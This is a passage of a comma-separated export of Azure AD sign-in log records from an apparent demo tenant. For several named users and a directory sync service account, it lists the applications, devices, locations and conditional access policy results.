'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c95450b3-582d-4306-9dd2-9bda845b1300,SigninLogs,Sucess,41.90428925,-85.99833679
+2058,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a40303c6-ee62-4dfb-8f87-1b27cdd93114,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",508b0c76-ee67-4f38-8f76-558a39711200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,508b0c76-ee67-4f38-8f76-558a39711200,SigninLogs,Sucess,33.7984581,-84.38828278
+2059,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:53.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b55d4bc5-8f4e-4f71-aa93-e4ec55e45ec9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",508b0c76-ee67-4f38-8f76-558a43711200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,508b0c76-ee67-4f38-8f76-558a43711200,SigninLogs,Sucess,33.7984581,-84.38828278
+2060,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,22eed375-959c-42fe-83f4-1f45724026f1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3c1797ce-9a4e-4e19-b7f0-81e032be1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3c1797ce-9a4e-4e19-b7f0-81e032be1100,SigninLogs,Sucess,36.6404686,-78.26995087
+2061,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:40.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6f236897-df12-4276-b03e-d568464ac467,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b7151b1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,669c457e-4441-4eab-88a8-07b7151b1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2062,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:21.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0c8aaf75-8554-487b-9239-e9caae46aff8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c8ea9bc1-b11e-4423-93a8-17c0162d1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c8ea9bc1-b11e-4423-93a8-17c0162d1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2063,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,adf76c3e-7a0d-4cea-8334-5d67861c5222,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3ce86b51100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5f11d930-41ca-43a7-b362-f3ce86b51100,SigninLogs,Sucess,41.90428925,-85.99833679
+2064,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:53.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f9037016-a42c-48cf-9ce5-375accb1cf67,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",9303d935-cf24-489a-bd00-a11cbe4d1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,9303d935-cf24-489a-bd00-a11cbe4d1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2065,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3e9fe24c-9df0-4808-b837-3e0e4a6bdbae,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93ca542e-4eab-45c4-8608-b715042b1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 